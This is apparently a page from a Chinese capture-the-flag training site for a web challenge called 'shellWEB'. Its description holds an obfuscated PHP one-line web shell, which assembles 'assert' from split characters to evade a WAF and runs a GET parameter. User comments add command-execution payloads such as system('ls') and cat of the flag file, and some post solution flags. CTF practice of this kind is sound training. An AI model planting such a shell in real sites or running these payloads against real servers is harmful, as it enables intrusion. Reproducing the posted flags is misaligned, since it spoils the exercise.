shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 9043
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
whitenul 1年前

flag{9fd11e2660d3ad1f535e9f1de957424a}

回复 0

InfoSec 1年前

这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。

回复 2

17795946336 1年前

flag{287b3bef4cb9712a82e858a1ad413de8}

回复 0

zh2815 1年前

:114.67.175.224:10266/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 1

soyotion 1年前

想多了,我以为要上传过狗的一句话木马,原来是上传好了

回复 0

G0 2年前

这题我喜欢

回复 0

yun20231227 2年前

?s=system('ls') 用这个命令,就可以看到flag文件

回复 0
1580155hsg 2年前

?s=system('cat flaga15808abee46a1d5.txt')

回复 3

向云端bugku 2年前

https://blog.csdn.net/weixin_47450099/article/details/139245987?spm=1001.2014.3001.5502 详解

回复 3

菜蔡蔡 2年前

启动不起来场景是什么原因啊啊啊

回复 0

不懂就问 2年前

学习参考:https://surpsec.blog.csdn.net/article/details/136709908

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

星宇Sec 攻破了该题 6小时前
zjw00 攻破了该题 7小时前
XYZ321 攻破了该题 8小时前
wzzzh 攻破了该题 8小时前
huya. 攻破了该题 18小时前
luze 攻破了该题 1天前
lzr19960502 攻破了该题 1天前
一颗栗子君 攻破了该题 1天前
yezia 攻破了该题 1天前
ly9henxihuan 攻破了该题 1天前
zzz122 攻破了该题 1天前
快乐每一天 攻破了该题 2天前
Alivesen 攻破了该题 2天前
ohltc 攻破了该题 2天前
凌源u 攻破了该题 2天前
镜花水月 攻破了该题 3天前
AlfaRivieor 攻破了该题 3天前
错过的恨 攻破了该题 3天前
mahiru 攻破了该题 3天前
yestcrday 攻破了该题 3天前
问题反馈